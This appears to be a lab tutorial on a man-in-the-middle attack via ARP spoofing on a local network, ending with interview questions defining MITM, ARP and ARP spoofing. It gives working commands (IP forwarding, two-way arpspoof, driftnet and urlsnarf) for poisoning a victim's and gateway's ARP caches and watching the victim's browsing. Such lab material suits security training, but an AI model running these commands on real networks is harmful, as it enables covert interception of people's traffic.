Implementing the MITM using ARP Spoofing using Back-Track 5 or Kali Linux
Tools description in brief:-
Nmap:- Used to discover the devices on the network
Arpspoof:- We use it twice
1. To lie to the Gateway about the MAC address of victim
MAC Address of Victim is that of Back-Track’s
2. To lie to the Victim about the MAC address of Gateway
MAC Address of Gateway is that of Back-Track’s
Driftnet:- Displays the Graphics, that Victim browses over Internet
Urlsnarf:- Gives the details of URLs, that Victim visits
Overview of the MITM Attack:-
After the Attack :-
1. In XP the Gateway MAC Address is changed to the MAC Address of Backtrack5
2. In Gateway the XP MAC Address is changed to the MAC Address of Backtrack5
In XP Machine:-
Step1: To see the IP Address: ipconfig
Step2: To see the ARP Cache: arp –a
Step3: To see the IP Address and MAC Address: ipconfig /all
In Backtrack5 Machine:-
Nmap Scan for choosing Victim:
Step1: To get the IP Address from DHCP Server: dhclient eth0
Step2: To see the IP Address & MAC Address: ifconfig eth0
Step3: To Route the traffic through Backtrack we have to enable the forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
Step4: To tell/lie to Victim XP that Gateway is at Backtrack MAC Address:
arpspoof –i eth0 –t <Victim IP> <Gateway IP>
Step5: Opening Wireshark to see the network traffic: wireshark
Step6: To tell/lie to Gateway that Victim XP is at Backtrack MAC Address:
arpspoof –i eth0 –t <Gateway IP> <Victim IP>
Step7: You can now see the spoofed ARP Cache in Victim-XP
Step8: To view the victim’s web surfing content in Backtrack5:
driftnet -i eth0 -> shows the graphics the user browses
urlsnarf -i eth0 -> shows urls visited by victim
Step9: Open Web-browser in XP and go to some site for example: www.google.com
Driftnet showing the images of victim’s browsing content in Backtrack5:
Urlsnarf showing the urls visited by victim in Backtrack5:
Possible Interview Questions:-
What is Man In The Middle Attack?
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
What is ARP?
The Address Resolution Protocol (ARP) is a widely used protocol for resolving network layer addresses into link layer addresses.
When an Internet Protocol (IP) datagram is sent from one host to another on a local area network, the destination IP address must be converted into a MAC address for transmission via the data link layer. When another host’s IP address is known, and its MAC address is needed, a broadcast packet is sent out on the local network. This packet is known as an ARP request. The destination machine with the IP in the ARP request then responds with an ARP reply, which contains the MAC address for that IP.
ARP is a stateless protocol. Network hosts will automatically cache any ARP replies they receive, regardless of whether or not they requested them. Even ARP entries which have not yet expired will be overwritten when a new ARP reply packet is received.
What is ARP Spoofing?
ARP spoofing is a technique whereby an attacker sends fake (“spoofed”) Address Resolution Protocol (ARP) messages onto a Local Area Network. Generally, the aim is to associate the attacker’s MAC address with the IP address of another host (such as the default gateway), causing any traffic meant for that IP address to be sent to the attacker instead.